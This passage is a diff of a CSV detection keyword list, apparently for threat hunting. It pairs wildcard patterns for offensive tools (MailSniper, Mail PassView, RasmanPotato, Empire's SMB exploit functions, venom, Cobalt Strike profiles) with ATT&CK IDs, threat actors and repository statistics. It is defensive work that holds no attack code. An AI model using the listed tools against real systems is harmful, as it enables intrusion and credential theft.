T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*magicRasMan*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*Magnitude Exploit Kit*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*mailpv.exe*","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mailpv.zip*","offensive_tool_keyword","mailpv","Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc...). It can be used as a non-administrative user to search their own email. or by an Exchange administrator to search the mailboxes of every user in a domain","T1083 - T1114 - T1003","TA0003 - TA0007 - TA0040","N/A","N/A","Information Gathering","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*MailSniper.ps1*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*MailSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc...). It can be used as a non-administrative user to search their own email. or by an Exchange administrator to search the mailboxes of every user in a domain","T1083 - T1114 - T1003","TA0003 - TA0007 - TA0040","N/A","N/A","Information Gathering","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*MailSniper.ps1*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*main/gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" "*main_air_service-probes.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*main_pro_service-probes.go*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*make_avet -l *.exe *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*make_avetsvc *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*make_kernel_shellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_kernel_user_payload*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb1_anonymous_login_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb1_echo_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb1_free_hole_session_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb1_nt_trans_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb1_trans2_explo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb2_payload_body_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*make_smb2_payload_headers_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_kernel_shellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_kernel_user_payload*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_anonymous_login_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*make_smb1_echo_packet*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - 